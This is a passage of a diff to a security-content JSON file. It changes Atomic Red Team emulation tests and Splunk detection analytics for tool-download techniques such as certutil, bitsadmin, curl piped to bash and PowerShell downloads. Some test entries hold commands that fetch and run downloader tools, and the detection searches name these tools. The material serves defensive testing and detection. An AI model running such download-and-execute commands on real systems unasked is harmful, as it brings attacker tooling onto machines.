%TEMP%\\redcanary.cab >nul 2>&1\n", "name": "command_prompt" } @@ -628478,12 +634392,12 @@ "dependencies": [ { "description": "#{vbscript_file} must be exist on system.\n", - "prereq_command": "if (Test-Path #{vbscript_file}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{vbscript_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105-download-file.vbs\" -OutFile \"#{vbscript_file}\"\n" + "prereq_command": "if (Test-Path \"#{vbscript_file}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{vbscript_file}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105-download-file.vbs\" -OutFile \"#{vbscript_file}\"\n" } ], "executor": { - "command": "wscript.exe #{vbscript_file}", + "command": "wscript.exe \"#{vbscript_file}\"\n", "cleanup_command": "del Atomic-License.txt >nul 2>&1", "name": "command_prompt" } @@ -628542,7 +634456,7 @@ { "description": "NimGrab must be installed on system.\n", "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\nimgrab.exe\") {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://nim-lang.org/download/nim-1.6.6_x64.zip\" -Outfile PathToAtomicsFolder\\..\\ExternalPayloads\\nim.zip\nExpand-Archive -Path PathToAtomicsFolder\\..\\ExternalPayloads\\nim.zip -DestinationPath PathToAtomicsFolder\\..\\ExternalPayloads\\nim -Force\nCopy-Item PathToAtomicsFolder\\..\\ExternalPayloads\\nim\\nim-1.6.6\\bin\\nimgrab.exe \"PathToAtomicsFolder\\..\\ExternalPayloads\\nimgrab.exe\"\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://nim-lang.org/download/nim-1.6.6_x64.zip\" -Outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\nim.zip\"\nExpand-Archive -Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\nim.zip\" -DestinationPath \"PathToAtomicsFolder\\..\\ExternalPayloads\\nim\" -Force\nCopy-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\nim\\nim-1.6.6\\bin\\nimgrab.exe\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\nimgrab.exe\"\n" } ] }, @@ -630655,7 +636569,7 @@ { "name": "Any Powershell DownloadFile", "description": "The following analytic identifies the use of PowerShell downloading a file using `DownloadFile` method. This particular method is utilized in many different PowerShell frameworks to download files and output to disk. Identify the source (IP/domain) and destination file and triage appropriately. If AMSI logging or PowerShell transaction logs are available, review for further details of the implant.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*DownloadFile* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `any_powershell_downloadfile_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*DownloadFile* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.parent_process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `any_powershell_downloadfile_filter`", "tags": { "name": "Any Powershell DownloadFile", "analytic_story": [ @@ -630898,7 +636812,7 @@ { "name": "Any Powershell DownloadString", "description": "The following analytic identifies the use of PowerShell downloading a file using `DownloadString` method. This particular method is utilized in many different PowerShell frameworks to download files and output to disk. Identify the source (IP/domain) and destination file and triage appropriately. If AMSI logging or PowerShell transaction logs are available, review for further details of the implant.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*.DownloadString* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `any_powershell_downloadstring_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*.DownloadString* by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `any_powershell_downloadstring_filter`", "tags": { "name": "Any Powershell DownloadString", "analytic_story": [ @@ -631140,29 +637054,190 @@ } }, { - "name": "BITSAdmin Download File", - "description": "The following query identifies Microsoft Background Intelligent Transfer Service utility `bitsadmin.exe` using the `transfer` parameter to download a remote object. In addition, look for `download` or `upload` on the command-line, the switches are not required to perform a transfer. Capture any files downloaded. Review the reputation of the IP or domain used. Typically once executed, a follow on command will be used to execute the dropped file. Note that the network connection or file modification events related will not spawn or create from `bitsadmin.exe`, but the artifacts will appear in a parallel process of `svchost.exe` with a command-line similar to `svchost.exe -k netsvcs -s BITS`. It's important to review all parallel and child processes to capture any behaviors and artifacts. In some suspicious and malicious instances, BITS jobs will be created. You can use `bitsadmin /list /verbose` to list out the jobs during investigation.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_bitsadmin` Processes.process IN (\"*transfer*\", \"*addfile*\") by Processes.dest Processes.user Processes.parent_process Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `bitsadmin_download_file_filter`", + "name": "BITSAdmin Download File", + "description": "The following query identifies Microsoft Background Intelligent Transfer Service utility `bitsadmin.exe` using the `transfer` parameter to download a remote object. In addition, look for `download` or `upload` on the command-line, the switches are not required to perform a transfer. Capture any files downloaded. Review the reputation of the IP or domain used. Typically once executed, a follow on command will be used to execute the dropped file. Note that the network connection or file modification events related will not spawn or create from `bitsadmin.exe`, but the artifacts will appear in a parallel process of `svchost.exe` with a command-line similar to `svchost.exe -k netsvcs -s BITS`. It's important to review all parallel and child processes to capture any behaviors and artifacts. In some suspicious and malicious instances, BITS jobs will be created. You can use `bitsadmin /list /verbose` to list out the jobs during investigation.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_bitsadmin` Processes.process IN (\"*transfer*\", \"*addfile*\") by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `bitsadmin_download_file_filter`", + "tags": { + "name": "BITSAdmin Download File", + "analytic_story": [ + "Ingress Tool Transfer", + "BITS Jobs", + "DarkSide Ransomware", + "Living Off The Land", + "Flax Typhoon" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation", + "Installation", + "Command And Control" + ], + "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to download a file.", + "mitre_attack_id": [ + "T1197", + "T1105" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "parent_process_name", + "type": "Process", + "role": [ + "Parent Process" + ] + }, + { + "name": "process_name", + "type": "Process", + "role": [ + "Child Process" + ] + } + ], + "risk_score": 49, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1197", + "mitre_attack_technique": "BITS Jobs", + "mitre_attack_tactics": [ + "Defense Evasion", + "Persistence" + ], + "mitre_attack_groups": [ + "APT39", + "APT41", + "Leviathan", + "Patchwork" + ] + }, + { + "mitre_attack_id": "T1105", + "mitre_attack_technique": "Ingress Tool Transfer", + "mitre_attack_tactics": [ + "Command And Control" + ], + "mitre_attack_groups": [ + "APT-C-36", + "APT18", + "APT28", + "APT29", + "APT3", + "APT32", + "APT33", + "APT37", + "APT38", + "APT39", + "APT41", + "Ajax Security Team", + "Andariel", + "Aquatic Panda", + "BITTER", + "BRONZE BUTLER", + "BackdoorDiplomacy", + "Chimera", + "Cobalt Group", + "Confucius", + "Darkhotel", + "Dragonfly", + "Elderwood", + "Ember Bear", + "Evilnum", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "IndigoZebra", + "Indrik Spider", + "Ke3chang", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "LuminousMoth", + "Magic Hound", + "Metador", + "Molerats", + "Moses Staff", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "PLATINUM", + "Patchwork", + "Rancor", + "Rocke", + "Sandworm Team", + "SideCopy", + "Sidewinder", + "Silence", + "TA505", + "TA551", + "TeamTNT", + "Threat Group-3390", + "Tonto Team", + "Tropic Trooper", + "Turla", + "Volatile Cedar", + "WIRTE", + "Whitefly", + "Windshift", + "Winnti Group", + "ZIRCONIUM", + "menuPass" + ] + } + ] + } + }, + { + "name": "CertUtil Download With URLCache and Split Arguments", + "description": "Certutil.exe may download a file from a remote destination using `-urlcache`. This behavior does require a URL to be passed on the command-line. In addition, `-f` (force) and `-split` (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for `certutil.exe` to contact public IP space. However, it is uncommon for `certutil.exe` to write files to world writeable paths.\\ During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil` (Processes.process=*urlcache* Processes.process=*split*) OR Processes.process=*urlcache* by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.original_file_name Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `certutil_download_with_urlcache_and_split_arguments_filter`", "tags": { - "name": "BITSAdmin Download File", + "name": "CertUtil Download With URLCache and Split Arguments", "analytic_story": [ "Ingress Tool Transfer", - "BITS Jobs", "DarkSide Ransomware", - "Living Off The Land" + "Living Off The Land", + "ProxyNotShell", + "CISA AA22-277A", + "Flax Typhoon", + "Forest Blizzard" ], "asset_type": "Endpoint", "cis20": [ "CIS 10" ], "kill_chain_phases": [ - "Exploitation", - "Installation", "Command And Control" ], "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to download a file.", "mitre_attack_id": [ - "T1197", "T1105" ], "nist": [ @@ -631198,24 +637273,10 @@ ] } ], - "risk_score": 49, + "risk_score": 90, "security_domain": "endpoint", - "risk_severity": "low", + "risk_severity": "high", "mitre_attack_enrichments": [ - { - "mitre_attack_id": "T1197", - "mitre_attack_technique": "BITS Jobs", - "mitre_attack_tactics": [ - "Defense Evasion", - "Persistence" - ], - "mitre_attack_groups": [ - "APT39", - "APT41", - "Leviathan", - "Patchwork" - ] - }, { "mitre_attack_id": "T1105", "mitre_attack_technique": "Ingress Tool Transfer", @@ -631300,17 +637361,15 @@ } }, { - "name": "CertUtil Download With URLCache and Split Arguments", - "description": "Certutil.exe may download a file from a remote destination using `-urlcache`. This behavior does require a URL to be passed on the command-line. In addition, `-f` (force) and `-split` (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for `certutil.exe` to contact public IP space. However, it is uncommon for `certutil.exe` to write files to world writeable paths.\\ During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil` (Processes.process=*urlcache* Processes.process=*split*) OR Processes.process=*urlcache* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.original_file_name Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `certutil_download_with_urlcache_and_split_arguments_filter`", + "name": "CertUtil Download With VerifyCtl and Split Arguments", + "description": "Certutil.exe may download a file from a remote destination using `-VerifyCtl`. This behavior does require a URL to be passed on the command-line. In addition, `-f` (force) and `-split` (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for `certutil.exe` to contact public IP space. \\ During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question. Using `-VerifyCtl`, the file will either be written to the current working directory or `%APPDATA%\\..\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\`. ", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil` (Processes.process=*verifyctl* Processes.process=*split*) OR Processes.process=*verifyctl* by Processes.dest Processes.user Processes.original_file_name Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `certutil_download_with_verifyctl_and_split_arguments_filter`", "tags": { - "name": "CertUtil Download With URLCache and Split Arguments", + "name": "CertUtil Download With VerifyCtl and Split Arguments", "analytic_story": [ "Ingress Tool Transfer", "DarkSide Ransomware", - "Living Off The Land", - "ProxyNotShell", - "CISA AA22-277A" + "Living Off The Land" ], "asset_type": "Endpoint", "cis20": [ @@ -631444,15 +637503,15 @@ } }, { - "name": "CertUtil Download With VerifyCtl and Split Arguments", - "description": "Certutil.exe may download a file from a remote destination using `-VerifyCtl`. This behavior does require a URL to be passed on the command-line. In addition, `-f` (force) and `-split` (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for `certutil.exe` to contact public IP space. \\ During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question. Using `-VerifyCtl`, the file will either be written to the current working directory or `%APPDATA%\\..\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\`. ", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil` (Processes.process=*verifyctl* Processes.process=*split*) OR Processes.process=*verifyctl* by Processes.dest Processes.user Processes.original_file_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `certutil_download_with_verifyctl_and_split_arguments_filter`", + "name": "Curl Download and Bash Execution", + "description": "The following analytic identifies the use of curl on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=curl (Processes.process=\"*-s *\") OR (Processes.process=\"*|*\" AND Processes.process=\"*bash*\") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `curl_download_and_bash_execution_filter`", "tags": { - "name": "CertUtil Download With VerifyCtl and Split Arguments", + "name": "Curl Download and Bash Execution", "analytic_story": [ "Ingress Tool Transfer", - "DarkSide Ransomware", - "Living Off The Land" + "Log4Shell CVE-2021-44228", + "Linux Living Off The Land" ], "asset_type": "Endpoint", "cis20": [ @@ -631461,7 +637520,7 @@ "kill_chain_phases": [ "Command And Control" ], - "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to download a file.", + "message": "An instance of $process_name$ was identified on endpoint $dest$ attempting to download a remote file and run it with bash.", "mitre_attack_id": [ "T1105" ], @@ -631483,13 +637542,6 @@ "Victim" ] }, - { - "name": "parent_process_name", - "type": "Process", - "role": [ - "Parent Process" - ] - }, { "name": "process_name", "type": "Process", @@ -631498,7 +637550,7 @@ ] } ], - "risk_score": 90, + "risk_score": 80, "security_domain": "endpoint", "risk_severity": "high", "mitre_attack_enrichments": [ @@ -631586,25 +637638,26 @@ } }, { - "name": "Curl Download and Bash Execution", - "description": "The following analytic identifies the use of curl on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=curl (Processes.process=\"*-s *\") OR (Processes.process=\"*|*\" AND Processes.process=\"*bash*\") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `curl_download_and_bash_execution_filter`", + "name": "Detect Certify Command Line Arguments", + "description": "The following analytic identifies when the attacker tool Certify or Certipy are used to enumerate Active Directory Certificate Services (AD CS) environments. The default command line arguments of these tools are similar and perform near identical enumeration or exploitation functions.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN (\"* find *\",\"* auth *\",\"* request *\",\"* req *\",\"* download *\",) AND Processes.process IN (\"* /vulnerable*\",\"* /enrolleeSuppliesSubject *\",\"* /json /outfile*\",\"* /ca*\", \"* -username *\",\"* -u *\") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `detect_certify_command_line_arguments_filter`", "tags": { - "name": "Curl Download and Bash Execution", + "name": "Detect Certify Command Line Arguments", "analytic_story": [ - "Ingress Tool Transfer", - "Log4Shell CVE-2021-44228", - "Linux Living Off The Land" + "Windows Certificate Services", + "Ingress Tool Transfer" ], "asset_type": "Endpoint", "cis20": [ "CIS 10" ], "kill_chain_phases": [ + "Exploitation", "Command And Control" ], - "message": "An instance of $process_name$ was identified on endpoint $dest$ attempting to download a remote file and run it with bash.", + "message": "Certify/Certipy arguments detected on $dest$.", "mitre_attack_id": [ + "T1649", "T1105" ], "nist": [ @@ -631612,31 +637665,41 @@ ], "observable": [ { - "name": "user", - "type": "User", + "name": "dest", + "type": "Hostname", "role": [ "Victim" ] }, { - "name": "dest", - "type": "Hostname", + "name": "process", + "type": "Process", "role": [ - "Victim" + "Attacker" ] }, { "name": "process_name", - "type": "Process", + "type": "Process Name", "role": [ - "Child Process" + "Attacker" ] } ], - "risk_score": 80, + "risk_score": 90, "security_domain": "endpoint", "risk_severity": "high", "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1649", + "mitre_attack_technique": "Steal or Forge Authentication Certificates", + "mitre_attack_tactics": [ + "Credential Access" + ], + "mitre_attack_groups": [ + "APT29" + ] + }, { "mitre_attack_id": "T1105", "mitre_attack_technique": "Ingress Tool Transfer", @@ -631723,7 +637786,7 @@ { "name": "Download Files Using Telegram", "description": "The following analytic will identify a suspicious download by the Telegram application on a Windows system. This behavior was identified on a honeypot where the adversary gained access, installed Telegram and followed through with downloading different network scanners (port, bruteforcer, masscan) to the system and later used to mapped the whole network and further move laterally.", - "search": "`sysmon` EventCode= 15 process_name = \"telegram.exe\" TargetFilename = \"*:Zone.Identifier\" |stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode Image process_id TargetFilename Hash | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `download_files_using_telegram_filter`", + "search": "`sysmon` EventCode= 15 process_name = \"telegram.exe\" TargetFilename = \"*:Zone.Identifier\" |stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode Image process_id TargetFilename Hash | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `download_files_using_telegram_filter`", "tags": { "name": "Download Files Using Telegram", "analytic_story": [ @@ -631736,7 +637799,7 @@ "kill_chain_phases": [ "Command And Control" ], - "message": "Suspicious files were downloaded with the Telegram application on $dest$ by $user$.", + "message": "Suspicious files were downloaded with the Telegram application on $dest$", "mitre_attack_id": [ "T1105" ], @@ -631745,14 +637808,7 @@ ], "observable": [ { - "name": "user", - "type": "User", - "role": [ - "Victim" - ] - }, - { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -632267,7 +638323,7 @@ "Delivery", "Installation" ], - "message": "An increase of Living Off The Land behavior has been detected on $affected_systems$", + "message": "An increase of Living Off The Land behavior has been detected on $risk_object$", "mitre_attack_id": [ "T1105", "T1190", @@ -632279,7 +638335,7 @@ ], "observable": [ { - "name": "affected_systems", + "name": "risk_object", "type": "Hostname", "role": [ "Victim" @@ -632792,41 +638848,737 @@ "ZIRCONIUM", "menuPass" ] - }, - { - "mitre_attack_id": "T1567", - "mitre_attack_technique": "Exfiltration Over Web Service", - "mitre_attack_tactics": [ - "Exfiltration" - ], - "mitre_attack_groups": [ - "APT28", - "Magic Hound" - ] - }, - { - "mitre_attack_id": "T1218", - "mitre_attack_technique": "System Binary Proxy Execution", - "mitre_attack_tactics": [ - "Defense Evasion" - ], - "mitre_attack_groups": [ - "Lazarus Group" - ] + }, + { + "mitre_attack_id": "T1567", + "mitre_attack_technique": "Exfiltration Over Web Service", + "mitre_attack_tactics": [ + "Exfiltration" + ], + "mitre_attack_groups": [ + "APT28", + "Magic Hound" + ] + }, + { + "mitre_attack_id": "T1218", + "mitre_attack_technique": "System Binary Proxy Execution", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [ + "Lazarus Group" + ] + } + ] + } + }, + { + "name": "PowerShell Script Block With URL Chain", + "description": "The following analytic identifies a suspicious PowerShell script execution via EventCode 4104 that contains multiple URLs within a function or array. This is typically found in obfuscated PowerShell or PowerShell executing embedded .NET or binary files that are attempting to download 2nd stage payloads. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts.", + "search": "`powershell` EventCode=4104 ScriptBlockText IN (\"*http:*\",\"*https:*\") | regex ScriptBlockText=\"(\\\"?(https?:\\/\\/(?:www\\.)?[-a-zA-Z0-9@:%._\\+~#=]{1,256}\\.[a-zA-Z0-9()]{1,6}\\b(?:[-a-zA-Z0-9()@:%_\\+.~#?&\\/=]*))\\\"?(?:,|\\))?){2,}\" | rex max_match=20 field=ScriptBlockText \"(?https?:\\/\\/(?:www\\.)?[-a-zA-Z0-9@:%._\\+~#=]{1,256}\\.[a-zA-Z0-9()]{1,6}\\b(?:[-a-zA-Z0-9()@:%_\\+.~#?&\\/=]*))\" | eval Path = case(isnotnull(Path),Path,true(),\"unknown\") | stats count min(_time) as firstTime max(_time) as lastTime list(ScriptBlockText) as command values(Path) as file_name values(UserID) as user values(url) as url dc(url) as url_count by ActivityID, Computer, EventCode | rename Computer as dest, EventCode as signature_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_script_block_with_url_chain_filter`", + "tags": { + "name": "PowerShell Script Block With URL Chain", + "analytic_story": [ + "Malicious PowerShell" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Installation", + "Command And Control" + ], + "message": "A suspicious powershell script used by $user$ on host $dest$ contains $url_count$ URLs in an array, this is commonly used for malware.", + "mitre_attack_id": [ + "T1059.001", + "T1105" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Endpoint", + "role": [ + "Victim" + ] + }, + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "file_name", + "type": "File Name", + "role": [ + "Attacker" + ] + }, + { + "name": "url", + "type": "URL String", + "role": [ + "Attacker" + ] + } + ], + "risk_score": 80, + "security_domain": "endpoint", + "risk_severity": "high", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1059.001", + "mitre_attack_technique": "PowerShell", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT19", + "APT28", + "APT29", + "APT3", + "APT32", + "APT33", + "APT38", + "APT39", + "APT41", + "Aquatic Panda", + "BRONZE BUTLER", + "Blue Mockingbird", + "Chimera", + "Cobalt Group", + "Confucius", + "CopyKittens", + "DarkHydrus", + "DarkVishnya", + "Deep Panda", + "Dragonfly", + "Earth Lusca", + "Ember Bear", + "FIN10", + "FIN6", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "Gallmaker", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "Inception", + "Indrik Spider", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "Magic Hound", + "Molerats", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "Patchwork", + "Poseidon Group", + "Sandworm Team", + "Sidewinder", + "Silence", + "Stealth Falcon", + "TA459", + "TA505", + "TEMP.Veles", + "TeamTNT", + "Threat Group-3390", + "Thrip", + "Tonto Team", + "Turla", + "WIRTE", + "Wizard Spider", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1105", + "mitre_attack_technique": "Ingress Tool Transfer", + "mitre_attack_tactics": [ + "Command And Control" + ], + "mitre_attack_groups": [ + "APT-C-36", + "APT18", + "APT28", + "APT29", + "APT3", + "APT32", + "APT33", + "APT37", + "APT38", + "APT39", + "APT41", + "Ajax Security Team", + "Andariel", + "Aquatic Panda", + "BITTER", + "BRONZE BUTLER", + "BackdoorDiplomacy", + "Chimera", + "Cobalt Group", + "Confucius", + "Darkhotel", + "Dragonfly", + "Elderwood", + "Ember Bear", + "Evilnum", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "IndigoZebra", + "Indrik Spider", + "Ke3chang", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "LuminousMoth", + "Magic Hound", + "Metador", + "Molerats", + "Moses Staff", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "PLATINUM", + "Patchwork", + "Rancor", + "Rocke", + "Sandworm Team", + "SideCopy", + "Sidewinder", + "Silence", + "TA505", + "TA551", + "TeamTNT", + "Threat Group-3390", + "Tonto Team", + "Tropic Trooper", + "Turla", + "Volatile Cedar", + "WIRTE", + "Whitefly", + "Windshift", + "Winnti Group", + "ZIRCONIUM", + "menuPass" + ] + } + ] + } + }, + { + "name": "PowerShell WebRequest Using Memory Stream", + "description": "This analytic identifies a common fileless malware staging technique of using .NET classes to directly download a URL payload into memory. The analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution.", + "search": "`powershell` EventCode=4104 ScriptBlockText IN (\"*system.net.webclient*\",\"*system.net.webrequest*\") AND ScriptBlockText=\"*IO.MemoryStream*\" | eval Path = case(isnotnull(Path),Path,true(),\"unknown\") | stats count min(_time) as firstTime max(_time) as lastTime list(ScriptBlockText) as command values(Path) as file_name values(UserID) as user by ActivityID, Computer, EventCode | rename Computer as dest, EventCode as signature_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_webrequest_using_memory_stream_filter`", + "tags": { + "name": "PowerShell WebRequest Using Memory Stream", + "analytic_story": [ + "Malicious PowerShell" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Installation", + "Command And Control", + "Exploitation" + ], + "message": "Powershell webrequest to memory stream behavior. Possible fileless malware staging on $dest$ by $user$.", + "mitre_attack_id": [ + "T1059.001", + "T1105", + "T1027.011" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Endpoint", + "role": [ + "Victim" + ] + }, + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "file_name", + "type": "File Name", + "role": [ + "Attacker" + ] + } + ], + "risk_score": 80, + "security_domain": "endpoint", + "risk_severity": "high", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1059.001", + "mitre_attack_technique": "PowerShell", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT19", + "APT28", + "APT29", + "APT3", + "APT32", + "APT33", + "APT38", + "APT39", + "APT41", + "Aquatic Panda", + "BRONZE BUTLER", + "Blue Mockingbird", + "Chimera", + "Cobalt Group", + "Confucius", + "CopyKittens", + "DarkHydrus", + "DarkVishnya", + "Deep Panda", + "Dragonfly", + "Earth Lusca", + "Ember Bear", + "FIN10", + "FIN6", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "Gallmaker", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "Inception", + "Indrik Spider", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "Magic Hound", + "Molerats", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "Patchwork", + "Poseidon Group", + "Sandworm Team", + "Sidewinder", + "Silence", + "Stealth Falcon", + "TA459", + "TA505", + "TEMP.Veles", + "TeamTNT", + "Threat Group-3390", + "Thrip", + "Tonto Team", + "Turla", + "WIRTE", + "Wizard Spider", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1105", + "mitre_attack_technique": "Ingress Tool 